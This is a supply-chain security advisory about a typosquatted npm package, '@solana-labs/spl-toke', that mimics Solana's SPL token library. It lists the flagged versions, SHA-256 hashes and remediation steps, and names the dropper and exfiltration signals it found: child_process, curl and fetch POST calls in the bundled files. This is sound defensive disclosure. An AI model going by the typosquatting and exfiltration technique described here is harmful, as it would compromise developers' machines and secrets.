Which versions of @solana-labs/spl-toke are malicious?

The following npm versions of @solana-labs/spl-toke are flagged malicious: 1.0.0, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.10, 1.98.111, 1.98.112. Treat any of these as compromised.

How do I remediate @solana-labs/spl-toke if I installed it?

Remove @solana-labs/spl-toke from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Can O3 Security detect @solana-labs/spl-toke in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking @solana-labs/spl-toke and packages like it before any post-install script runs.

Malicious package

@solana-labs/spl-tokenpm

Malicious code in @solana-labs/spl-toke (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5787

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @solana-labs/spl-toke

What this malware does

Package name @solana-labs/spl-toke is a one-character omission of the legitimate @solana-labs/spl-token package, abusing the official Solana Labs scope-and-name shape to confuse installers. The bundled outputs at lib/index.cjs.js and lib/index.esm.js contain repeated co-occurrences of require('child_process'), curl invocations, fetch( calls, and POST request shapes spread across many lines (e.g. cjs lines 11441, 11466, 11479, 11495, 11535 for child_process; lines 11441, 11495, 11535, 11589, 11629 for curl; lines 5041/5046, 11464, 11558, 11652 for fetch+POST). The combination of (a) a clear typosquat against a top-tier blockchain SDK namespace and (b) bundled subprocess + outbound HTTP primitives in a package that purports to be a thin SPL-token client matches the supply-chain dropper/exfil shape and should not be allowed to install on developer or build machines.

Malicious versions

8 flagged

1.0.01.0.51.0.61.0.71.0.81.0.101.98.1111.98.112

Indicators of compromise (SHA-256)

0a75812030937ae0ecf6c5d267667b2454058a324711bf3280ed3e97eb5f8b5a

f92bf1c5408d5c80d1bb78242f7315df61273713e07dfad4892f01d0c451e916

0b23badd2ad9e0607dabb4d58bc78762691e31c58c9b548db11e0543e21d40fc

5e83e440dfb72440a6534ecc320ef618b829630c5cb0fbed432f1237fd45f9ec

75b8b946808d1c68fd9c479993b8ed19b103030b3d37a6feeba099f6d4c02b62

d10819a7af9f7f0fd57651626b41a13492ba3841206caa870fdcfbbb0516836b

96715c34660630d56f91507a3de9fe64c47de50c19afe8de61107ecc78a0ac38

a91d0a65c4acdc298a7775a0f4a2e3a65dd07ede8c4731fabefce12525ae38e6

ae699ea42c65454a0a9fd55bfd47f9eb9647b9a2dcc604ddd4296cf5a72a32ce

f4473251be335760795fc2692450b59c06efa8a7227daf3c2d384cd26f1808d5

16921c38f633d6edf7d7207cdc7cb695891a2f6d8cc6f234144a9ca4f3bd90a0

1e6354850b8587cc5b396376a5401bbe99f34df134f815a39c9690e37a21e75f

490ce5d7e43d8a79aa85bbd24e7140ed074eee472f375092ab9b4cd650ce41f8

4c3108856cfed00df1ae55c038ee7354339ba02864924e43baefb1ca13499531

6962bb20fc11a76d4a8235c0cf55f36a941167d4cae085e5a391ea7637b8ceb6

e56cb6f556b8a711af49f2feabc153d8d20fc9f410db77a5da2855382f946803

Frequently asked questions

No. @solana-labs/spl-toke on npm has been identified as a malicious package (versions 1.0.0, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.10, 1.98.111, 1.98.112 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006587IN-MAL-2026-006575IN-MAL-2026-006581IN-MAL-2026-006577IN-MAL-2026-006579IN-MAL-2026-006574IN-MAL-2026-006584IN-MAL-2026-006582IN-MAL-2026-006573IN-MAL-2026-006586IN-MAL-2026-006585IN-MAL-2026-006580IN-MAL-2026-006576IN-MAL-2026-006578IN-MAL-2026-006588IN-MAL-2026-006583

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection